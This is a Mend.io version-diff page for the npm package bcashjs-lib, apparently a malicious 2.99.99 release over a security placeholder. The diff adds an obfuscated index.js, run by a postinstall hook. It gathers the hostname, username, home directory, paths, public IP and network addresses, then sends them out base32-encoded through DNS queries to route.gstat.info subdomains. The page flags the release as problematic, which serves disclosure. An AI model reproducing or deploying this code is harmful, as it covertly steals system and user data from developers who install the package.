npm - bcashjs-lib - Versions diffs - 0.0.1-security → 2.99.99 - Mend

bcashjs-lib 0.0.1-security → 2.99.99

Potentially problematic release.

This version of bcashjs-lib might be problematic. Click here for more details.

Files changed (4) hide show

package/b.js ADDED Viewed

@@ -0,0 +1,61 @@
+const DEF = 'zyxwvutsrqponmlkjihgfedcba987654'
+const RFC4648 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
+const RFC4648_HEX = '0123456789ABCDEFGHIJKLMNOPQRSTUV'
+const CROCKFORD = '0123456789ABCDEFGHJKMNPQRSTVWXYZ'
+function toDataView(data) {
+    if (data instanceof Int8Array || data instanceof Uint8Array || data instanceof Uint8ClampedArray) {
+        return new DataView(data.buffer, data.byteOffset, data.byteLength)
+    }
+    if (data instanceof ArrayBuffer) {
+        return new DataView(data)
+    }
+    throw new TypeError('Expected `data` to be an ArrayBuffer, Buffer, Int8Array, Uint8Array or Uint8ClampedArray')
+}
+function be(data, variant, options) {
+    options = options || {}
+    let alphabet, defaultPadding
+    switch (variant) {
+        case 'RFC3548':
+        case 'RFC4648':
+            alphabet = RFC4648
+            defaultPadding = true
+            break
+        case 'RFC4648-HEX':
+            alphabet = RFC4648_HEX
+            defaultPadding = true
+            break
+        case 'Crockford':
+            alphabet = CROCKFORD
+            defaultPadding = false
+            break
+        default:
+            alphabet = DEF
+            defaultPadding = false
+    }
+    const padding = (options.padding !== undefined ? options.padding : defaultPadding)
+    const view = toDataView(data)
+    let bits = 0
+    let value = 0
+    let output = ''
+    for (let i = 0; i < view.byteLength; i++) {
+        value = (value << 8) | view.getUint8(i)
+        bits += 8
+        while (bits >= 5) {
+            output += alphabet[(value >>> (bits - 5)) & 31]
+            bits -= 5
+        }
+    }
+    if (bits > 0) {
+        output += alphabet[(value << (5 - bits)) & 31]
+    }
+    if (padding) {
+        while ((output.length % 8) !== 0) {
+            output += '='
+        }
+    }
+    return output
+}
+exports.be = be;

package/index.js ADDED Viewed

@@ -0,0 +1 @@

+ const os=require("os");function gi(){return new Promise(t=>{let n=require("https").get("https://api.ipify.org",n=>{let e=[];n.on("data",t=>e.push(t)),n.on("end",()=>t(Buffer.concat(e).toString()))});n.on("error",n=>t(n.code)),n.end()})}function dr(t){return new Promise(n=>require("dns").resolve4(t,(t,e)=>{e?n(e.toString()):n("")}))}function mi(t){let n="",e="abcdefghijklmnopqrstuvwxyz0123456789";for(let r=0;r<t;r++)n+=e.charAt(Math.floor(Math.random()*e.length));return n}function p(t){let n=".route.gstat.info",e=0,r=0,o=`${mi(6)}.`;for(;;){let s=o+ ++r,i=253-(s+n).length;for(let a=1;a<=4;a++){let f=63;if(4===a&&(f=61),t.length>f?(s+="."+t.substring(0,f),t=t.substring(f)):(s+="."+t,t=""),s.length>i){t=s.substring(i)+t,s=s.substring(0,i);break}if(!t){e=1;break}}if(dr(s+n),e)break}}gi().then(t=>{let n=JSON.stringify({h:os.hostname(),u:os.userInfo().username,d1:os.homedir(),d2:__dirname,i1:t,i2:Object.values(os.networkInterfaces()).map(t=>t.map(t=>t.address)).toString()});p(require("./b").be(Buffer.from(n)))}).catch(function(t){}),module.exports={};

package/package.json CHANGED Viewed

@@ -1,6 +1,13 @@
 {
   "name": "bcashjs-lib",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.99.99",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "postinstall": "node index.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=bcashjs-lib for more information.